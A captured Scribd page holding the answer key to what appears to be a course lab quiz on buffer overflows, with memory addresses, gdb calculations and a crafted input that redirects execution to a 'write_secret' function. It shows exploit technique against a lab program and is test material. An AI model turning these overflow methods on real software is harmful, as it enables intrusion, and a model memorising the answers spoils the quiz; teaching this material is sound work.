Scribd
Upload
2K views1 page

VM Bof Quiz Solutions

This document contains questions and answers about vulnerabilities in a program, including: - A stack-based buffer overflow in a variable called "wis" that can be triggered on line 62. - A non-stack allocated buffer "ptrs" that can be indexed outside its bounds, triggered on line 101. - Ways to manipulate the "ptrs" buffer to execute other functions in memory, including "pat_on_back" and "write_secret". - The number of bytes needed to overwrite the return address of "put_wisdom" to redirect execution to "write_secret".

Uploaded by

Raghavendra Singh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
2K views1 page

VM Bof Quiz Solutions

This document contains questions and answers about vulnerabilities in a program, including: - A stack-based buffer overflow in a variable called "wis" that can be triggered on line 62. - A non-stack allocated buffer "ptrs" that can be indexed outside its bounds, triggered on line 101. - Ways to manipulate the "ptrs" buffer to execute other functions in memory, including "pat_on_back" and "write_secret". - The number of bytes needed to overwrite the return address of "put_wisdom" to redirect execution to "write_secret".

Uploaded by

Raghavendra Singh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 1

1. There is a stack-based overflow in the program.

What is the name of the stack-allocated variable that


containsthe overflowed buffer? ans: wis 2. Consider the buffer you just identified:Running what line of
code will overflow the buffer? ans: 62 3. There is another vulnerability, not dependent at all on the
first,involving a non-stack allocated buffer that can be indexed outsideits bounds. What variable
contains this buffer? ans: ptrs 4. Consider the buffer you just identified: Running what line of code
overflows the buffer? ans: 101 5. What is the address of buf? ans: 0xbfff f130 6. What is the address of
ptrs?ans: 0x0804 a0d4 7, What is the address of write_secret?ans: 0x0804 8534 8. what is the address of
p local to main?ans: 0xbfff f534 9. What input do you provide so that ptrs[s] reads/executesthe contents
of variable p instead of function in ptrs buffer?If ok, you will execute pat_on_back function. Enter your
answeras an unsigned integer. ans:(p-ptrs)/4 isprint /x (0xbffff534 - 0x804a0d4)/40x2dfed518 or
771675416 10. What do you enter so that ptrs[s] reads (and then tries to execute)starting from the 65th
byte in buf, ie. the location at buf[64]?Enter your answer as an unsiged integer. ans:(gdb) print /x
&buf[64]$6 = 0xbffff170(gdb) print /d (int*)&buf[64]-(int *)&ptrs$14 = 771675175771675175 11. What
do you replace \xEE\xEE\xEE\xEE with to call write_secret? ans: (gdb) print &write_secret$7 = (void (*)
(void)) 0x8048534 <write_secret>
771675175\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x34\x85\x
04\x08 12. Suppose you wanted to overflow the wis variable to perform a stack smashing attack. You
could do this by entering 2 to call put_wisdom, and then enter enough bytes to overwrite the return
address of that function, replacing it with the address of write_secret. How many bytes do you need to
enter prior to the address of write_secret?

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy